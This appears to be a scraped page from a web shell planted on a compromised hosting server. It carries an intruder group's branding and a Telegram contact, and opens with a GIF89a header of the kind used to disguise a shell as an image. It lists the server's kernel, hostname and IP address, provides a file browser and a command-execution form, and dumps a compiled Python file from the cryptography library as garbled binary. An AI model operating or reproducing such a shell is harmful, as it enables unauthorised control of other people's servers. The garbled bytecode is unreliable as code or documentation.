GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
proc
/
self
/
root
/
opt
/
alt
/
python38
/
lib64
/
python3.8
/
site-packages
/
cryptography
/
x509
/
__pycache__
[ HOME ]
Exec
Submit
certificate_transparency.cpython-38.pyc
U qX�f� � @ s� d dl mZ d dlZd dlZd dlmZ d dlmZ d dl m Z G dd� dej�ZG dd � d ej�Z G d d� dej�ZG dd � d ejd�Ze�ej� dS )� )�annotationsN)�utils)�x509)� HashAlgorithmc @ s e Zd ZdZdZdS )�LogEntryTyper � N)�__name__� __module__�__qualname__ZX509_CERTIFICATEZPRE_CERTIFICATE� r r �]/opt/alt/python38/lib64/python3.8/site-packages/cryptography/x509/certificate_transparency.pyr s r c @ s e Zd ZdZdS )�Versionr N)r r r �v1r r r r r s r c @ s e Zd ZdZdZdZdZdZdS )�SignatureAlgorithmz� Signature algorithms that are valid for SCTs. These are exactly the same as SignatureAlgorithm in RFC 5246 (TLS 1.2). See: <https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1> r r � � N)r r r �__doc__Z ANONYMOUSZRSAZDSAZECDSAr r r r r s r c @ s� e Zd Zeejdd�dd���Zeejdd�dd���Zeejdd�d d ���Zeejdd�dd ���Z eejdd�dd���Z eejdd�dd���Zeejdd�dd���Zeejdd�dd���Z dS )�SignedCertificateTimestampr )�returnc C s dS )z* Returns the SCT version. Nr ��selfr r r �version( s z"SignedCertificateTimestamp.version�bytesc C s dS )zM Returns an identifier indicating which log this SCT is for. Nr r r r r �log_id/ s z!SignedCertificateTimestamp.log_idzdatetime.datetimec C s dS )z5 Returns the timestamp for this SCT. Nr r r r r � timestamp6 s z$SignedCertificateTimestamp.timestampr c C s dS )zV Returns whether this is an SCT for a certificate or pre-certificate. Nr r r r r � entry_type= s z%SignedCertificateTimestamp.entry_typer c C s dS )zJ Returns the hash algorithm used for the SCT's signature. Nr r r r r �signature_hash_algorithmD s z3SignedCertificateTimestamp.signature_hash_algorithmr c C s dS )zM Returns the signing algorithm used for the SCT's signature. Nr r r r r �signature_algorithmK s z.SignedCertificateTimestamp.signature_algorithmc C s dS )z5 Returns the signature for this SCT. Nr r r r r � signatureR s z$SignedCertificateTimestamp.signaturec C s dS )zG Returns the raw bytes of any extensions for this SCT. Nr r r r r �extension_bytesY s z*SignedCertificateTimestamp.extension_bytesN)r r r �property�abc�abstractmethodr r r r r r r r r r r r r '